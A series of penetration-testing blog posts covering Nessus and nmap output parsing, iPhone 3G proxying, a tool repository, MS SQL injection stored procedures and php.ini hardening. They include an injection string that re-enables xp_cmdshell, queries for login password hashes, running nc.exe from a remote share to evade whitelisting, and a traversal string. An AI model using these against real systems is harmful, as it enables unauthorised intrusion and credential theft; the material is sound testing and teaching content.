Monday, 18 February 2013

De-duping multiple-interface Nessus results with sed.

A bit of a mouthful and not that useful for most, but this is saving me headaches left, right and centre at the moment (and is dead simple).

It's always an issue when testing a network that you can run into the same box multiple times under different addresses; this became all too apparent to me recently when I was testing 4 boxes with over 20 interfaces between them, serving up different services. When it comes to reporting, the customer isn't going to want to know about the same issues on the same ports on the same box multiple times, but manually separating this lot out of Nessus is a nightmare... sed to the rescue.

Let's assume that you have your Nessus output and have it in some useful, parseable format (xmlstarlet, anyone?).

Let's also assume that you have a list of IPs that match up to each hostname. First things first, create an ip2host.sed file and fill it with your replace statements, e.g.

s/192.168.0.1/host1/g
s/192.168.0.2/host1/g
s/192.168.0.3/host1/g
s/192.168.0.4/host1/g
s/192.168.0.5/host2/g
s/192.168.0.6/host2/g
s/192.168.0.7/host3/g
s/192.168.0.8/host3/g
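
If you already have the IP-to-hostname mapping sat in a two-column file (IP then hostname, one pair per line; ip2host.txt is just a made-up name here), you can generate the sed script rather than typing it out by hand. A rough sketch:

awk '{print "s/"$1"/"$2"/g"}' ip2host.txt > ip2host.sed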

Next step is nice and simple, either:

sed -f ip2host.sed << EOF | sort | uniq

and copy and paste your results into the terminal, ending with EOF, or...

sed -f ip2host.sed < fileofservices.txt | sort | uniq

if you've already saved the file. This will take:

192.168.0.1:443
192.168.0.2:443
192.168.0.3:443
192.168.0.5:25
etc

and convert it to:

host1:443
host2:25
etc.

Not a complicated one today, but always a handy one to remember.

Ben





Thursday, 15 November 2012

Proxying 3G iPhone Data



Hey! It's been a while. I promised you guys that I'd do this more often and I've failed you, and for that I am sorry (well, sort of). So today I'm taking a break from automation to talk to you lovely folks about something I've been working on lately: proxying. Not just proxying, but proxying iPhone apps. No wait, not just proxying iPhone apps, but proxying iPhone apps' traffic over 3G. Is there a setting for that? No! (At least there isn't in iOS 5; iOS 6 has one, but only through the Configuration Utility.)

It was a pain in the ass, but it is possible, with caveats. Firstly, the iPhone has to be jailbroken; secondly, you need to edit some config files. If you're cool with that, read on.

Step 1

Jailbreak your phone.

Step 2

Edit the /private/var/preferences/SystemConfiguration/preferences.plist file.

Locate the "ip1" section:

<dict>
    <key>Interface</key>
    <dict>
        <key>DeviceName</key>
        <string>ip1</string>
        <key>Hardware</key>
        <string>com.apple.CommCenter</string>
        <key>Type</key>
        <string>com.apple.CommCenter</string>
    </dict>

Then add the following section immediately afterwards (still inside the outer dict):

    <key>Proxies</key>
    <dict>
        <key>ProxyAutoConfigEnable</key>
        <integer>1</integer>
        <key>ProxyAutoConfigURLString</key>
        <string>file:///private/var/preferences/proxy.pac</string>
    </dict>

Step 3

Create the following file: /private/var/preferences/proxy.pac

and add the following:

function FindProxyForURL(url, host)
{
    return "PROXY YOUR_EXTERNAL_IP:8080";
}

Note: as this is over the 3G network, your proxy needs to be reachable from the internet. If you're planning on using Burp, I'd probably use a netcat tunnel through a box you have on EC2; alternatively, just open up a port on your home router and use that.
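
For what it's worth, if Burp is sat behind NAT, an SSH remote port forward from the box running Burp up to that EC2 host does the same job as a netcat tunnel; this is just a sketch, and the username, hostname and port are placeholders:

ssh -R 8080:localhost:8080 user@your-ec2-box

You'll probably need GatewayPorts set to yes in the EC2 box's sshd_config so that the forwarded port listens on the external interface rather than just loopback, and the PAC file then points at the EC2 box's address.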

Step 4

Fire up your proxy and restart your phone; it doesn't get much simpler than that.

Step X

Something I've been doing to make app testing a bit easier is using Veency, a VNC tool for your iPhone (available on Cydia) that lets you interact with it from your PC. Life is a lot easier when you have full use of your keyboard and mouse on your phone.

Proxying 3G traffic actually yielded some interesting results: certain apps that weren't even active authenticated (over plain text) with their servers on phone boot. I won't give away who here, but they have been notified that this is bad.

Hope that was somewhat useful; it was for me anyway. Until next time, come say hello @bdpuk.

Byeeeeeeeeeeee.

Tuesday, 17 July 2012

PaulDotCom Interview

A big thanks to Paul, Mike and Larry (and Carlos) for having us on the show; we really enjoyed it. Apologies for being a bit uptight in places, but we're British, it's what we do. And, for the record, I do like Nessus really (printers don't) and SANS rock (apart from their examination style). You can check out the video of us chatting shite here: http://pauldotcom.com/2012/07/pentesticles-penetration-testi.html. I'll be emailing Paul with some better 'your network's shite' comments in the London vernacular! PENTESTICLES AWAY!!!!

Thursday, 12 July 2012

HackArmoury.com - A Pentesticles Project!


Recently, we at Pentesticles took over the ownership and full development of HackArmoury.com. So, I thought it was time to write a blog post about it and speak a bit about what it does, how to use it and what we’re planning for it in the future. We'll also be talking a bit about this tonight (12th July 2012) at 11pm UK time (6pm ET) on PaulDotCom, so make sure you don't miss it!

HackArmoury is something I’ve personally been involved in since its creation (by me ol’ mucka @nopslider) and it has proven to be a useful resource for the penetration testing community. Ben and I are now putting a bit of focus on it and continuing its development and maintenance. I've also skinned the site since the changeover; I'm still not sure about the Tango-orange colour. It's not a dig at gingers, honest.

So, what is HackArmoury? For those who haven’t used it, it’s essentially a tool repository for ethical hacking and penetration testing. The key advantage is that HackArmoury can be accessed over loads of popular protocols, including SVN, TFTP, HTTP, IPv6 and Samba (see below for the full list and instructions), and older versions of tools are maintained. This means that if there are network restrictions on where you’re trying to update from, you have the best chance of being able to connect and get your tools.

Another key feature of the site is that the entire repository of tools is packed into a single ISO, which can be downloaded directly. Each time a new tool is added, the ISO is updated and re-packed meaning that it’s always up-to-date.

Our next addition will be Git, as this is an obvious hole. Once we've sorted the technical aspects and worked out the security implications, we'll be ready to go!

We're always looking for trustworthy contributors, so if you fancy helping us tool-up, please drop me an email at lawrence[at]hackarmoury.com or through the comments on this blog. In the meantime, I hope you enjoy using the site and it proves useful.

How can I connect? There are lots of ways to connect up; you can do this via the following methods:


IPv6

IPv6 is now supported by HackArmoury (2a02:af8:1000:8c::2f98:4ed7). If you want to access us directly over IPv6, and you can't remember a 128-bit address, use the hostname ipv6.hackarmoury.com. All of our common protocols will be supported.


Samba

You can access all your tools straight over Samba using \\hackarmoury.com\tools\. No authentication required, just start->run->\\hackarmoury.com\tools\ and you're away.

For example, to run nc.exe, simply type \\hackarmoury.com\tools\all_binaries\nc.exe. If running on a Windows host with executable blacklisting or whitelisting, it's always worth testing over Samba too. In many cases this execution method is permitted without consideration for the consequences.
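
If you're coming from a Linux box instead, smbclient should do the same job; a quick sketch, using the same share layout as the Windows example above:

smbclient //hackarmoury.com/tools -N -c 'cd all_binaries; get nc.exe'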

HTTP

Everything in the toolkit is browseable over HTTP and HTTPS. Navigate directly to http://hackarmoury.com/tools and you're away.
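
If you just want a single binary rather than a browse, something like wget works too (assuming the same all_binaries layout as the Samba share above):

wget http://hackarmoury.com/tools/all_binaries/nc.exe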


Rsync

To minimise download bandwidth, you can keep up-to-date with our tool set over rsync. Use the following command to download, after reading our licensing terms:

rsync -avz rsync://hackarmoury.com/tools /ha

As with all other protocols, no authentication is required to download.


Subversion (SVN)

You can keep an offline copy of the armoury simply by doing a Subversion checkout. If you're regularly running the tools, it makes much more sense to keep an offline copy for speed and portability. It’s a much more efficient way of keeping up-to-date with new tools, as you don't need to be scouting around the site or downloading large ISO images.

Simply type:

svn co svn://hackarmoury.com/live /ha

To update, navigate to your local directory and perform:

svn update


TFTP

Only executable files are available over TFTP, as the protocol doesn't provide a directory structure, and you must know the name of the file in advance.

You can download files like this:

tftp -i hackarmoury.com get nc.exe

You may find this useful in some poorly implemented egress filtering scenarios.

Tuesday, 29 May 2012

We Have the Port Scans, What Now?


It's been a while, I hope you're good. I'm fine thanks, busy as sin but isn't that always the way? So where did we leave off? From reading back through my previous post, we'd scanned our little guts out and pulled a list of all ports that were open and all the services that can be interacted with. Boy haven't we been busy! 

It just so happens that now is when the real fun begins. Have a bit of a peruse through the results; not that easy to read, eh? Sure, we can quickly find some 135, 445 and have a quick fiddle through the lovely, lovely file shares, but where's the automation? This post should cover some basics about gathering even more data from the services we've identified, using our ever-faithful set of tools such as nikto, gnome-web-photo, curl et al., and keeping the data usable.

First things first, let's bring all of our results together in a more machine-readable way. From the previous post we've grabbed all of our nmap output in the three decent formats: plain, greppable and XML. For the purposes of this post we'll be using the XML format and parsing it with xmlstarlet (for those of you that aren't already using starlet, grab a copy; it's a brilliant little command-line parser that I can't live without. Nessus, nmap, SureCheck, anything that dumps XML suddenly becomes friendly to use again!)

The little gem I've been using for a while now is:

cat port_scans/hot-targets.tcp.services | xmlstarlet sel -T -t -m "//state[@state='open']" -m ../../.. -v address/@addr -m hostnames/hostname -i @name -o '  (' -v @name -o ')' -b -b -b -o "," -m .. -v @portid -o ',' -v @protocol -o "," -m service -v @name -i "@tunnel='ssl'" -o 's' -b -o "," -v @product -o ' ' -v @version -v @extrainfo -b -n -| sed 's_^\([^\t ]*\)\( ([^)]*)\)\?\t\([^\t ]*\)_\1.\3\2_' | sort -n -t.

This is a slightly bastardised version of a one-liner brought to you by the lovely folks at Redspin. It takes an nmap XML output file (singular in this case) and creates output like this:

10.13.37.10,22,tcp,ssh,OpenSSH 4.3protocol 2.0
10.13.37.10,2301,tcp,http,CompaqHTTPServer *** httpd
10.13.37.10,2381,tcp,http,Apache httpd SSL-only mode
10.13.37.10,3260,tcp,iscsi,
10.13.37.10,5988,tcp,http,Web-Based *** httpd
10.13.37.10,5989,tcp,https,Web-Based *** httpd
10.13.37.11,427,tcp,svrloc,
10.13.37.11,443,tcp,https,VMware ESXi Server httpd
10.13.37.11,5989,tcp,tcpwrapped,
10.13.37.11,8000,tcp,http-alt,
10.13.37.11,8042,tcp,fs-agent,
10.13.37.11,8045,tcp,unknown,
10.13.37.11,80,tcp,http,
10.13.37.11,8100,tcp,tcpwrapped,
10.13.37.11,902,tcp,vmware-auths,VMware Authentication Daemon 1.10

Isn't this a lot more greppable than -oG? Having the data dumped out to CSV allows us to rapidly move through it and select the exact services we want to interrogate. An example:

root@bt:~# cat output.csv | grep http
10.13.37.10,2301,tcp,http,CompaqHTTPServer *** httpd
10.13.37.10,2381,tcp,http,Apache httpd SSL-only mode
10.13.37.10,5988,tcp,http,Web-Based *** httpd
10.13.37.10,5989,tcp,https,Web-Based *** httpd
10.13.37.11,443,tcp,https,VMware ESXi Server httpd
10.13.37.11,8000,tcp,http-alt,
10.13.37.11,80,tcp,http, 

An even better example:

root@bt:~# cat output.csv | grep http | cut -f 1,2 -d "," | tr "," ":"
10.13.37.10:2301
10.13.37.10:2381
10.13.37.10:5988
10.13.37.10:5989
10.13.37.11:443
10.13.37.11:8000
10.13.37.11:80

An even better example still:

root@bt:~# cat output.csv | grep http | cut -f 1,2 -d "," | tr "," ":" | while read line; do /pentest/web/nikto/nikto.pl -config /pentest/web/nikto/nikto.conf -h $line -output $line.txt; done
....snip....

You get the idea.

While we're on the subject, a nice precursor to nikto is a bit of web scouring. We've all been in the situation before where we've been on an internal test with limited time, only to discover 100 webservers spread across the network; it's always a case of best efforts and being left wondering if the ones we missed were the ones that would've bent over. This is where webscour comes in. It's a little script from Geoff over at Cyberis (available here) that, given a list of addresses, grabs screenshots (using gnome-web-photo) and header information from each webserver and produces a handy HTML file to view them all from. Suddenly all the default content and HP OpenViews can be found quickly, and we can move straight on to the Accounting App running Classic ASP on IIS4 that hasn't been in use for 5 years.

Incidentally, this can be run in a similar fashion to the one-liner above:

root@bt:~# cat output.csv | grep http | cut -f 1,2 -d "," | tr "," ":" | ./webscour.pl webservers.htm

As you can imagine, there is a lot more we can do with webservers; DirBuster, skipfish the sitekiller and any other forced-browse tool or fuzzer can usually be used in this way, and as always the more data the better.
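
For example, a rough dirb equivalent of the nikto loop above (sketch only: wordlist and options left as defaults, and the https ports would want treating separately):

root@bt:~# cat output.csv | grep http | cut -f 1,2 -d "," | tr "," ":" | while read line; do dirb http://$line -o dirb_$line.txt; done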

Next steps as far as web servers are concerned usually involve getting this information into Burp, so that we can play with it properly. Buby is a sensible choice, and further down the line we'll look into automated spidering and active scanning from the terminal, replaying nikto/DirBuster output directly into Burp, and utilising FuzzDB to profile any CMSs we come across. But that, unfortunately, will have to wait for another post.

As usual, for any thoughts, critiques or straightforward calling out, either head down to the comments or hit me up on Twitter. Hwyl am Nawr!

Final Thoughts

It wouldn't be fair if I weren't to go off-topic at least once in a post, so here you go...

cat output.csv | grep 161,udp | cut -f 1 -d "," | /pentest/enumeration/snmp/onesixtyone/onesixtyone -c /pentest/enumeration/snmp/onesixtyone/dict.txt -o onesixtyone.out -i -

Have some SNMP fun, y'all!

Tuesday, 8 May 2012

MS SQL - Useful Stored Procedures for SQL Injection and Ports Info.



The following post lists and describes various useful stored procedures and port information for MS SQL. The information is relevant for all versions unless stated (there may be a couple of mistakes, so corrections are welcome). The information is from many different sources including MS Technet, various books and several people’s brains (mostly mine - such as it is!). Its main use is as a learning tool or reference for performing SQL injection attacks.

Important Stored procedures

sp_columns – returns column names of tables
sp_configure – Returns internal database settings. Allows you to specify a particular setting and retrieve its value.
sp_dboption – Views or sets user configurable database options
sp_who2 and sp_who – Displays usernames, the client from which they’re connected, the application used to connect to the database, the command executed on the database and several other pieces of info.


Parameterised Extended stored procedures

xp_cmdshell – Executes a given command string as an operating system command shell. The default current directory is %SystemRoot%\System32. This procedure is disabled by default in SQL 2005 onwards, but can be re-enabled remotely by running the following command (either as a straight query or as part of an injection):

;exec sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE

SQLmap (--os-cmd) will do this automatically, but I haven’t had much success with it on real-world tests.
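
For reference, the sort of invocation I mean (the URL and parameter are placeholders, obviously):

sqlmap -u "http://target/page.asp?id=1" --os-cmd=ipconfig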

xp_regread – Reads a registry value.
xp_servicecontrol – Stops or starts a Windows service.
xp_terminate_process – Kills a process based on its process ID.

Non-parameterised Extended Stored Procedures

xp_loginconfig – Displays login information, particularly the login mode (mixed etc) and default login.
xp_logininfo – Shows currently logged in accounts (NTLM accounts).
xp_msver – Lists SQL version and platform info.
xp_enumdsn – Enumerates ODBC data sources.
xp_enumgroups – Enumerates Windows groups.

System Table Objects

Many of the system tables from earlier releases of SQL Server are now implemented as a set of views. These views are known as compatibility views, and they are meant for backward compatibility only. The compatibility views expose the same metadata that was available in SQL Server 2000. However, the compatibility views do not expose any of the metadata related to features that are introduced in SQL Server 2005 and later.

syscolumns (2000) – All column names and stored procedures for the current database
sysusers – All users who can manipulate the database
sysfiles – The file and pathname for the current database and its log file.
systypes – Data types defined by SQL or users.


Master DB Tables

sysconfigures – Current DB config settings.
sysdatabases – Lists all DBs on server
sysdevices – Enumerates devices used for DB
sysxlogins (2000) – Enumerates user info for each permitted user of the database
sql_logins (2005) – Enumerates user info for each permitted user of the database
sysremotelogins – Enumerates user info for all users permitted to remote access DB
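
By way of example, the sort of queries you'd end up running against these (column names quoted from memory, so treat them as a starting point rather than gospel):

SELECT name FROM master..sysdatabases
SELECT name, password FROM master..sysxlogins          -- SQL 2000
SELECT name, password_hash FROM master.sys.sql_logins  -- SQL 2005 onwards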

Ports

The default ports for MS SQL are TCP/1433 and UDP/1434. However, the service can be deployed ‘hidden’ on 2433 (this is MS’s idea of hiding!).

UDP 1434 was introduced in SQL 2000 and provides a referral service for multiple instances of SQL running on the same machine. The service listens on this port and returns the IP address and port number of the requested database.
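
This also makes UDP 1434 a handy way of sweeping for instances that have been moved off 1433; nmap's ms-sql-info script will query the browser service for you (adjust the target range to suit):

nmap -sU -p 1434 --script ms-sql-info <target range>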

Below is a script from MS TechNet showing the ‘fix’ for opening ports on Windows Firewall for MS SQL 2008. This is pretty interesting!

@echo =========  SQL Server Ports  ===================
@echo Enabling SQLServer default instance port 1433
netsh firewall set portopening TCP 1433 "SQLServer"
@echo Enabling Dedicated Admin Connection port 1434
netsh firewall set portopening TCP 1434 "SQL Admin Connection"
@echo Enabling conventional SQL Server Service Broker port 4022 
netsh firewall set portopening TCP 4022 "SQL Service Broker"
@echo Enabling Transact-SQL Debugger/RPC port 135
netsh firewall set portopening TCP 135 "SQL Debugger/RPC"
@echo =========  Analysis Services Ports  ==============
@echo Enabling SSAS Default Instance port 2383
netsh firewall set portopening TCP 2383 "Analysis Services"
@echo Enabling SQL Server Browser Service port 2382
netsh firewall set portopening TCP 2382 "SQL Browser"
@echo =========  Misc Applications  ==============
@echo Enabling HTTP port 80
netsh firewall set portopening TCP 80 "HTTP"
@echo Enabling SSL port 443
netsh firewall set portopening TCP 443 "SSL"
@echo Enabling port for SQL Server Browser Service's 'Browse' Button
netsh firewall set portopening UDP 1434 "SQL Browser"
@echo Allowing multicast broadcast response on UDP (Browser Service Enumerations OK)
netsh firewall set multicastbroadcastresponse ENABLE

It’s also worth bearing these other ports in mind when port scanning or enumerating instances of MS SQL.

Wednesday, 2 May 2012

Security Related Directives in php.ini (for Pen Testers and Devs)


For those of you not overly familiar with PHP, php.ini is where you define your settings. As a penetration tester, you should be used to seeing the symptoms of these settings either not being set or being misconfigured. This post aims to pinpoint the directives that developers should be familiar with, and also show penetration testers the nuts and bolts of the issues they’re seeing so that they may better advise their clients. Feel free to post any more detail or additional directives that you believe should be included.

disable_functions

The disable_functions directive is very important, as it controls which functions are available to be used or abused. When designing an application, if it does not require high-risk functions such as passthru(), system() and exec(), then these functions should be disabled (note that eval() is a language construct rather than a function, so it cannot be disabled this way). The disable_functions directive is not affected by Safe Mode; however, only internal functions can be disabled using it. User-defined functions are unaffected.
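
As a rough example of the sort of line you'd put in php.ini (the exact list depends entirely on what the application genuinely needs):

disable_functions = system,exec,shell_exec,passthru,popen,proc_open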

open_basedir

Enabling open_basedir will restrict file access to a specifically defined directory; all file operations will then be limited to what has been specified. It is recommended that any file operations be located within a certain set of directories. If this is implemented, standard directory traversal strings, e.g. “../../../../etc/passwd”, will not escape the configured directory. This directive is not affected by Safe Mode being turned on or off.

When a script tries to open a file with, for example, fopen() or gzopen(), the location of the file is checked. When the file is outside the specified directory tree, PHP will refuse to open it. All symbolic links are resolved, so it's not possible to avoid this restriction with a symlink. If the file doesn't exist, the symlink can't be resolved and the filename is compared to (a resolved) open_basedir.

The special value ‘.’ indicates that the working directory of the script will be used as the base-directory. This is, however, a little dangerous as the working directory of the script can easily be changed with chdir().

In httpd.conf, open_basedir can be turned off (e.g. for some virtual hosts) the same way as any other configuration directive with "php_admin_value open_basedir none".
Under Windows, separate the directories with a semicolon. On all other systems, separate the directories with a colon. As an Apache module, open_basedir paths from parent directories are now automatically inherited. The restriction specified with open_basedir is a directory name since PHP 5.2.16 and 5.3.4. Previous versions used it as a prefix. This means that "open_basedir = /dir/incl" also allowed access to "/dir/include" and "/dir/incls" if they exist. When you want to restrict access to only the specified directory, end with a slash. For example: 

open_basedir = /dir/incl/

The default is to allow all files to be opened.

expose_php

Setting this directive to Off will remove the PHP banner (the X-Powered-By header) from the server’s response headers. This is one layer of defence that obscures the fact that you’re using PHP (from banner grabbing, at least), and more importantly which version is in use, and it is a good defence-in-depth technique.

allow_url_fopen

Disabling this directive prevents remote file inclusion vulnerabilities from working, as PHP's file functions will refuse to fetch remote URLs. An example of this would be if the $absolute_path variable in the following code example were set to http://www.randomsite.com/; the exploit would fail with allow_url_fopen set to Off. (From PHP 5.2 onwards, the separate allow_url_include directive specifically controls whether include() and require() will accept URLs.)

include ($absolute_path.'inc/adodb.inc.php');

display_errors

The display_errors directive is a simple but important setting that controls whether detailed errors are shown to the user when an exception occurs. This setting should always be switched off in a production environment.
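
In php.ini terms that's simply the following (log_errors isn't covered above, but pairing the two is the usual approach so the detail still ends up somewhere useful):

display_errors = Off
log_errors = On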

safe_mode

Enabling safe_mode in PHP enforces strict file access checks. This is done by comparing the owner of the PHP script that is running against the owner of any file the script attempts to access; should they not match, PHP throws a security exception. safe_mode is commonly used by ISPs so that multiple users can develop their own PHP scripts without risking the integrity of the server. (Like register_globals below, safe_mode was deprecated in PHP 5.3.0 and removed in 5.4.0.)

register_globals

When enabled, register_globals injects user-created scripts with various variables, such as request variables from HTML forms. This, coupled with the fact that PHP doesn't require variable initialisation, makes writing insecure code much easier. A controversial change after PHP 4.2.0 was switching register_globals from On to Off by default. Reliance on this directive was widespread, and many people didn't even know it existed, assuming it was simply how PHP worked. Even though this was a difficult decision, the PHP community decided to disable it by default: with it enabled, developers use variables without really knowing for sure where they come from, and internal variables defined in the script itself get mixed up with request data sent by users. Disabling register_globals changes this.

NB – register_globals has been deprecated as of PHP 5.3.0 and removed as of PHP 5.4.0.

Summary

The settings within php.ini are not a fix-all by any means, but they provide defence-in-depth for any application using PHP. As a penetration tester, it’s important to be able to tell developers what they’re doing wrong when vulnerabilities are discovered, and understanding how a scripting language such as PHP works at a global level helps with that. A huge pet hate of mine is when testers (Nessus, Core Impact or <Insert automated web security scanner> monkeys) report an issue, don’t understand what the issue is, don’t provide a working example and don’t explain the impact specific to the application. Apart from providing a poor service (which the client is probably paying £1000 per day for), this creates the perception that all penetration testers do is ‘run scans’, and that takes a lot of time and conversations with security managers and developers to reverse! Rant over; I hope this is useful as both a learning tool and a reference.

An additional source of information regarding PHP and its directives can be found here: http://ific.uv.es/informatica/manuales/php/.